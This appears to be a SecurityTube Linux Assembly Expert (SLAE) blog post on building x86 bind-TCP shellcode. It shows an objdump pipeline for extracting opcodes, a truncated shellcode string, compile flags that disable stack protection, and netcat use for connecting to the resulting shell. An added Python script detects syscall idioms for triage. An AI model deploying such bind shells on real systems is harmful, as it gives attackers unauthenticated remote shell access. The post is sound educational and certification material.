SLAE Assignment #1 – Shell_Bind_TCP Shellcode

Files available on GitHub

  1. Assignment1.nasm
  4. shellcode.c

In this assignment, I implemented the socket setup with socketcall() in assembly and redirected STDIN, STDOUT, and STDERR to the socket. Using a cut-and-trim pipeline picked up from commandlinefu, the opcodes are extracted and pasted into a small generator program, which the user runs with an argument specifying the port to use. Its output is then placed in the shellcode.c skeleton program, which is compiled without stack protection and with an executable stack.

Here’s the trim command to extract the opcodes:

objdump -d ./shell_bind_tcp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Step 1:  Compile assignment1.nasm

Step 2:  Extract the opcodes

Run the generator with -p <port number of choice>:

./ -p 1337
Shellcode : "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1

Insert that output into the code[] variable of the skeleton C program.

Compile with the stack protector off and an executable stack (the shellcode runs from a data buffer, so both are required):

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

Run it, then connect from another terminal with netcat to the port you specified, and you're in!
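As an added illustration (not code from the original post or its repository), the Python script below does the same job as the objdump pipeline above, then reads the resulting "\x.." string back and flags the i386 syscall-setup idioms (push imm8/pop eax, push imm8/pop ebx, mov al, int 0x80) that an analyst looks for when triaging a blob of this kind. The objdump excerpt is constructed here to match the opening bytes shown in the post; the syscall and socketcall numbers are the standard i386 values, and all function names are my own.

```python
import re

# --- Constructed sample input (not captured from the post's binary) --------
# A few `objdump -d` lines in the shape the post's pipeline consumes; the
# bytes match the opening of the shellcode string shown in the post.
SAMPLE_OBJDUMP = "\n".join([
    "./shell_bind_tcp:     file format elf32-i386",
    "",
    "Disassembly of section .text:",
    "",
    "08049000 <_start>:",
    " 8049000:\t6a 66                \tpush   $0x66",
    " 8049002:\t58                   \tpop    %eax",
    " 8049003:\t6a 01                \tpush   $0x1",
    " 8049005:\t5b                   \tpop    %ebx",
    " 8049006:\t31 f6                \txor    %esi,%esi",
    " 8049008:\t56                   \tpush   %esi",
    " 8049009:\t53                   \tpush   %ebx",
    " 804900a:\t6a 02                \tpush   $0x2",
    " 804900c:\t89 e1                \tmov    %esp,%ecx",
])

# i386 syscall numbers (syscall_32.tbl) and socketcall() sub-calls (linux/net.h)
SYSCALLS = {0x66: "socketcall", 0x3f: "dup2", 0x0b: "execve"}
SOCKETCALLS = {1: "SYS_SOCKET", 2: "SYS_BIND", 4: "SYS_LISTEN", 5: "SYS_ACCEPT"}

# "  8049000:<tab>6a 66 ..." -> capture the hex byte pairs only
OBJDUMP_LINE = re.compile(r"^\s*[0-9a-f]+:\s+((?:[0-9a-f]{2} )+)")


def parse_objdump(text: str) -> bytes:
    """Collect opcode bytes from `objdump -d` output in address order.
    Same job as the post's grep/cut/sed pipeline, without the shell quoting."""
    out = bytearray()
    for line in text.splitlines():
        m = OBJDUMP_LINE.match(line)
        if m:  # 'file format', section and label lines do not match
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def to_c_literal(blob: bytes) -> str:
    """Render bytes as the "\\x..\\x.." string that is pasted into code[]."""
    return '"' + "".join(f"\\x{b:02x}" for b in blob) + '"'


def from_c_literal(literal: str) -> bytes:
    """Inverse of to_c_literal: recover raw bytes from a pasted string."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))


def find_syscall_markers(blob: bytes):
    """Locate the idioms a hand-written i386 syscall stub uses to load eax/ebx
    and trap into the kernel.  Returns (offset, description) pairs so the
    call sequence can be read off without a full disassembler."""
    hits = []
    n = len(blob)
    for i, b in enumerate(blob):
        if b == 0x6A and i + 2 < n and blob[i + 2] == 0x58:        # push imm8; pop eax
            num = blob[i + 1]
            if num in SYSCALLS:
                hits.append((i, f"eax={num:#x} {SYSCALLS[num]}"))
        elif b == 0x6A and i + 2 < n and blob[i + 2] == 0x5B:      # push imm8; pop ebx
            num = blob[i + 1]
            if num in SOCKETCALLS:
                hits.append((i, f"ebx={num} {SOCKETCALLS[num]}"))
        elif b == 0xB0 and i + 1 < n and blob[i + 1] in SYSCALLS:  # mov al, imm8
            hits.append((i, f"eax={blob[i + 1]:#x} {SYSCALLS[blob[i + 1]]}"))
        elif b == 0xCD and i + 1 < n and blob[i + 1] == 0x80:      # int 0x80
            hits.append((i, "int 0x80"))
    return hits


def looks_like_bind_shell(blob: bytes) -> bool:
    """True only when the whole socket/bind/listen/accept + dup2 + execve
    sequence is present; a truncated blob (like the post's listing) is
    reported as incomplete rather than as a match."""
    seen = {desc.split()[-1] for _, desc in find_syscall_markers(blob)}
    needed = {"socketcall", "SYS_SOCKET", "SYS_BIND", "SYS_LISTEN",
              "SYS_ACCEPT", "dup2", "execve"}
    return needed <= seen


if __name__ == "__main__":
    blob = parse_objdump(SAMPLE_OBJDUMP)
    print(to_c_literal(blob))
    for off, desc in find_syscall_markers(blob):
        print(f"{off:4d}: {desc}")
    print("complete bind-shell sequence:", looks_like_bind_shell(blob))
```

The push/pop pattern matcher is deliberately loose: the same three-byte idioms occur in ordinary compiled code, so on its own a hit is a lead for a closer look, not a verdict. The sequence check in looks_like_bind_shell is what turns a pile of hits into a meaningful classification, and it says "incomplete" for the truncated prefix the post prints.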


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID:  SLAE-860
